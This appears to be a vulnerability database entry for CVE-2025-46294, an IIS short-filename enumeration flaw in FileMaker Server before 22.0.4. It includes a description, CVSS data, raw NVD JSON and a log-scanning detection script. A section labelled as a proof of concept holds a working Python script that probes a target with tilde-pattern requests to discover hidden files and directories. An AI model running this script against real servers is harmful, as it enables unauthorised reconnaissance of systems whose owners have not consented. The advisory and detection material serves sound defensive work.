Security Vulnerability Report
CVE-2025-46294 CVSS 5.3 MEDIUM

CVE-2025-46294

Published: 2025-12-16 18:16:12
Last Modified: 2025-12-23 14:44:32

Description

To enhance security, the FileMaker Server 22.0.4 installer now includes an option to disable IIS short filename enumeration by setting NtfsDisable8dot3NameCreation in the Windows registry. This prevents attackers from using the tilde character to discover hidden files and directories. This vulnerability has been fully addressed in FileMaker Server 22.0.4. The IIS Shortname Vulnerability exploits how Microsoft IIS handles legacy 8.3 short filenames, allowing attackers to infer the existence of files or directories by crafting requests with the tilde (~) character.
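A defender-side check for the behaviour described above, as an added example that is not part of the original record or of Claris's advisory: it scans IIS W3C logs for clients sending repeated requests whose URI contains a tilde followed by a digit. The log lines, field selection, IP addresses and the threshold of 3 are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2025-12-20 10:00:01 GET /fmi/webd 198.51.100.7 200
2025-12-20 10:00:02 GET /~0 203.0.113.9 404
2025-12-20 10:00:02 GET /~1 203.0.113.9 400
2025-12-20 10:00:03 GET /~1.as* 203.0.113.9 400
2025-12-20 10:00:03 GET /~2.ht* 203.0.113.9 404
2025-12-20 10:00:04 GET /users/~alice/index.html 198.51.100.7 200
"""

# Tilde followed by a digit, the shape of an 8.3 short name suffix.
TILDE_PROBE = re.compile(r"~\d")


def find_tilde_probes(log_text, threshold=3):
    """Return {client_ip: [(uri, status), ...]} for clients with at least
    `threshold` requests whose URI stem contains a ~<digit> pattern."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names follow the directive
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated row
        row = dict(zip(fields, parts))
        uri = row.get("cs-uri-stem", "")
        if TILDE_PROBE.search(uri):
            hits[row.get("c-ip", "-")].append((uri, row.get("sc-status", "-")))
    return {ip: reqs for ip, reqs in hits.items() if len(reqs) >= threshold}


if __name__ == "__main__":
    for ip, reqs in find_tilde_probes(SAMPLE_LOG).items():
        print(f"{ip}: {len(reqs)} tilde requests")
        for uri, status in reqs:
            print(f"  {status} {uri}")
```

The per-client threshold keeps a single legitimate URL that happens to contain `~1` from raising an alert; tune it to the traffic the server normally sees.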

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:* - VULNERABLE
FileMaker Server < 22.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-46294 IIS Short Name Enumeration PoC
# Target: FileMaker Server with IIS

import requests
import sys
from concurrent.futures import ThreadPoolExecutor


def check_shortname(target_url, suffix):
    """Check if a short filename exists by testing ~suffix pattern"""
    paths_to_test = [
        f"/~{suffix}",
        f"/~{suffix}.as*",
        f"/~{suffix}.ht*",
        f"/~{suffix}.co*"
    ]

    for path in paths_to_test:
        try:
            url = f"{target_url.rstrip('/')}{path}"
            response = requests.get(url, timeout=5, verify=False)

            # If status is 400 Bad Request, short name exists
            # If status is 404 Not Found, short name doesn't exist
            if response.status_code == 400:
                return {'suffix': suffix, 'path': path, 'exists': True}
            elif response.status_code == 404:
                continue
        except requests.RequestException:
            continue

    return {'suffix': suffix, 'path': None, 'exists': False}


def enumerate_shortnames(target_url, max_suffix=20, threads=10):
    """Enumerate potential short filenames"""
    print(f"[*] Starting IIS shortname enumeration on {target_url}")
    print(f"[*] Testing suffixes 0-{max_suffix} with {threads} threads\n")

    results = []
    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = [executor.submit(check_shortname, target_url, i)
                   for i in range(max_suffix + 1)]
        for future in futures:
            result = future.result()
            if result['exists']:
                results.append(result)
                print(f"[+] Found potential file/directory: ~{result['suffix']}")

    print(f"\n[*] Enumeration complete. Found {len(results)} potential targets.")
    return results


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-46294_poc.py <target_url>")
        print("Example: python cve-2025-46294_poc.py http://filemaker-server/")
        sys.exit(1)

    target = sys.argv[1]
    enumerate_shortnames(target)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46294", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:12.360", "lastModified": "2025-12-23T14:44:32.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "To enhance security, the FileMaker Server 22.0.4 installer now includes an option to disable IIS short filename enumeration by setting NtfsDisable8dot3NameCreation in the Windows registry. This prevents attackers from using the tilde character to discover hidden files and directories. This vulnerability has been fully addressed in FileMaker Server 22.0.4. The IIS Shortname Vulnerability exploits how Microsoft IIS handles legacy 8.3 short filenames, allowing attackers to infer the existence of files or directories by crafting requests with the tilde (~) character."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.0.4", "matchCriteriaId": "72210F6C-78D0-449C-BD0A-A175305D1F3B"}]}]}], "references": [{"url": "https://support.claris.com/s/answerview?anum=000048450&language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}